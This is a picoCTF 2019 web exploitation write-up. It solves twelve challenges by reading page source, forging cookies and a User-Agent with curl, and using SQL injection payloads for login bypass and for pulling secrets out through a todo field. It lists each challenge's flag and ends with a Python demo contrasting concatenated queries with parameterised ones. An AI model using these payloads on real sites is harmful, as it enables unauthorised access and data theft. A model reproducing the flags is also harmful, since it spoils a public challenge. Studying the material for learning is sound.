picoCTF2019 | Web Exploitation Writeup



Web Exploitation Writeup


Table of Contents

  1. Insp3ct0r - Points: 50
  2. dont-use-client-side - Points: 100
  3. logon - Points: 100
  4. where are the robots - Points: 100
  5. Client-side-again - Points: 200
  6. Open-to-admins - Points: 200
  7. picobrowser - Points: 200
  8. Irish-Name-Repo 1 - Points: 300
  9. Irish-Name-Repo 2 - Points: 350
  10. Irish-Name-Repo 3 - Points: 400
  11. Empire1 - Points: 400
  12. Empire2 - Points: 450

Insp3ct0r - Points: 50
Kishor Balan tipped us off that the following code may need inspection: https://2019shell1.picoctf.com/problem/63975/ (link) or http://2019shell1.picoctf.com:63975

Hint: How do you inspect web code on a browser? There's 3 parts


Inspect the page's HTML, CSS and JS sources; the hint's three parts correspond to these three files.

picoCTF{tru3_d3t3ct1ve_0r_ju5t_lucky?d3db9182}


dont-use-client-side - Points: 100
Can you break into this super secure portal? https://2019shell1.picoctf.com/problem/45147/ (link) or http://2019shell1.picoctf.com:45147

Hint: Never trust the client


The flag is in the page source: view source on the login page.

picoCTF{no_clients_plz_4a60f3}


logon - Points: 100
The factory is hiding things from all of its users. Can you login as logon and find what they've been looking at? https://2019shell1.picoctf.com/problem/32270/ (link) or http://2019shell1.picoctf.com:32270

Hint: Hmm it doesn't seem to check anyone's password, except for {{name}}'s?


- Log in as admin (as the hint suggests, the password is not checked)
- Open the browser developer tools and look under Storage for the site's cookies
- Change the admin cookie's value from False to True and reload the page

picoCTF{l3arn_th3_r0p35}


where are the robots - Points: 100
Can you find the robots? https://2019shell1.picoctf.com/problem/32229/ (link) or http://2019shell1.picoctf.com:32229

Hint: What part of the website could tell you where the creator doesn't want you to look?


$ wget --spider -r --no-parent http://2019shell1.picoctf.com:32229

picoCTF{ca1cu1at1ng_Mach1n3s_0ecd0}


Client-side-again - Points: 200
Can you break into this super secure portal? https://2019shell1.picoctf.com/problem/47277/ (link) or http://2019shell1.picoctf.com:47277

Hint: What is obfuscation?


Analyze the obfuscated JavaScript and reorder the pieces it assembles to recover the flag.

picoCTF{not_this_again_d29871}


Open-to-admins - Points: 200
This secure website allows users to access the flag only if they are admin and if the time is exactly 1400. https://2019shell1.picoctf.com/problem/12276/ (link) or http://2019shell1.picoctf.com:12276

Hint: Can cookies help you to get the flag?


$ curl "https://2019shell1.picoctf.com/problem/12276/flag" -H "Cookie: time=1400; admin=True;" -s | grep -oE "picoCTF{.*}"

picoCTF{0p3n_t0_adm1n5_dcb566bb}


picobrowser - Points: 200
This website can be rendered only by picobrowser, go and catch the flag! https://2019shell1.picoctf.com/problem/12255/ (link) or http://2019shell1.picoctf.com:12255

Hint: You don't need to download a new web browser


$ curl "https://2019shell1.picoctf.com/problem/12255/flag" -H "User-Agent:picobrowser" -s | grep -oE "picoCTF{.*}"

picoCTF{p1c0_s3cr3t_ag3nt_bbe8a517}


Irish-Name-Repo 1 - Points: 300
There is a website running at https://2019shell1.picoctf.com/problem/32241/ (link) or http://2019shell1.picoctf.com:32241. Do you think you can log us in? Try to see if you can login!

Hint: There doesn't seem to be many ways to interact with this, I wonder if the users are kept in a database?

Hint: Try to think about how the website verifies your login.

This is a SQL injection challenge. View the login page's source (Ctrl+U), find the hidden debug field, set its value to 1 and submit any login request:

<input type="hidden" name="debug" value="1">
The debug output then shows the query the server builds from the submitted fields:

username: admin
password: admin
SQL query: SELECT * FROM users WHERE name='admin' AND password='admin'

Login failed.
Because the username is concatenated straight into the query, an injected quote followed by a comment marker closes the string and discards the password check. The following payload bypasses the login:

# 'or 1=1 --
curl "https://2019shell1.picoctf.com/problem/32241/login.php" --data "username='+or+1=1+--&password=1234" && echo

picoCTF{s0m3_SQL_0397f20c}


Irish-Name-Repo 2 - Points: 350
There is a website running at https://2019shell1.picoctf.com/problem/14912/ (link) or http://2019shell1.picoctf.com:14912. Someone has bypassed the login before, and now it's being strengthened. Try to see if you can still login!

Hint: The password is being filtered.

Like the previous one, this is a SQL injection challenge. The only difference is that the password input is now checked, as the hint says. The following payload in the username field does the job:

curl "https://2019shell1.picoctf.com/problem/14912/login.php" --data "username='+--&password=admin" && echo

picoCTF{m0R3_SQL_plz_752d1173}


Irish-Name-Repo 3 - Points: 400
There is a secure website running at https://2019shell1.picoctf.com/problem/47247/ (link) or http://2019shell1.picoctf.com:47247. Try to see if you can login as admin!

Hint: Seems like the password is encrypted.

Like the previous ones, this is a SQL injection challenge, but this time the password appears to be encrypted in some way. After setting debug to 1 as before and submitting a login request, the output is:

password: 'or 1=1--
SQL query: SELECT * FROM admin where password = ''be 1=1--'
The server applies the same transformation to whatever is submitted ('or' came out as 'be'), so the payload has to be sent in pre-transformed form so that it turns into the intended SQL on the server side:

# 'be 1=1 --
curl "https://2019shell1.picoctf.com/problem/47247/login.php" --data "password='+be+1=1+--" && echo

picoCTF{3v3n_m0r3_SQL_c2c37f5e}


Empire1 - Points: 400
Psst, Agent 513, now that you're an employee of Evil Empire Co., try to get their secrets off the company website. https://2019shell1.picoctf.com/problem/49726/ (link) or http://2019shell1.picoctf.com:49726 Can you first find the secret code they assigned to you?

Hint: Pay attention to the feedback you get

Hint: There is *very* limited filtering in place - this to stop you from breaking the challenge for yourself, not for you to bypass.

Hint: The database gets reverted every 2 hours if you do break it, just come back later

SQL injection on the register and login pages was tried first; these pages do not seem to be vulnerable. So a user was created. After logging in, the todo page was the first thing noticed, and a simple injection was tried there. It didn't work either, but an error was displayed afterwards, which showed this was the right way. After some more attempts and research, the string that solved the challenge, entered as a todo item, is:

'||( select group_concat(secret) from user) ||'

picoCTF{wh00t_it_a_sql_injectdf389592}
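The login queries shown in the debug output of Irish-Name-Repo 1 to 3 and the todo insert exploited in Empire1 are both built by string concatenation. As an added example (not code from the writeup or from the challenges, which run PHP), the following Python/sqlite3 script rebuilds both with a constructed in-memory schema, runs the page's own payloads against the concatenated and the parameterised form of each statement, and shows that binding the input as a parameter is what closes the hole. The table and column names, the stored password and the secret value are assumptions; the table is called "users" here where the Empire1 payload on the page says "user".

```python
import sqlite3

# Constructed in-memory stand-in for the challenge database (assumed schema).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT, secret TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'hunter2', 'SECRET-CONSTRUCTED')")
    db.execute("CREATE TABLE todos (item TEXT)")
    return db

def login_concat(db, username, password):
    """Query built by string concatenation, the shape the debug output shows;
    a quote in the input ends the string literal and the rest becomes SQL."""
    query = f"SELECT * FROM users WHERE name='{username}' AND password='{password}'"
    return db.execute(query).fetchone() is not None

def login_param(db, username, password):
    """Same check with bound parameters: values travel separately from the
    statement text, so a quote or comment marker stays plain data."""
    query = "SELECT * FROM users WHERE name=? AND password=?"
    return db.execute(query, (username, password)).fetchone() is not None

def add_todo_concat(db, item):
    """Todo insert by concatenation: a '||(subquery)||' item gets evaluated."""
    db.execute(f"INSERT INTO todos (item) VALUES ('{item}')")

def add_todo_param(db, item):
    """Todo insert with a bound parameter: the item is stored verbatim."""
    db.execute("INSERT INTO todos (item) VALUES (?)", (item,))

def todo_items(db):
    return [row[0] for row in db.execute("SELECT item FROM todos")]

def demo():
    """Runs the page's two payloads against both forms and returns the outcomes."""
    bypass = "' or 1=1 --"
    exfil = "'||(select group_concat(secret) from users)||'"
    concat_db, param_db = make_db(), make_db()
    add_todo_concat(concat_db, exfil)
    add_todo_param(param_db, exfil)
    return {
        "concat_login_bypassed": login_concat(concat_db, bypass, "1234"),
        "param_login_bypassed": login_param(param_db, bypass, "1234"),
        "concat_todo_stored": todo_items(concat_db),   # the secret leaks
        "param_todo_stored": todo_items(param_db),     # the literal string
    }

if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```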